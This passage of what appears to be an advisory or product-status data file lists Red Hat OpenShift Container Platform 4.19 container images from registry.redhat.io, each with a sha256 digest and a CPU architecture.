"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
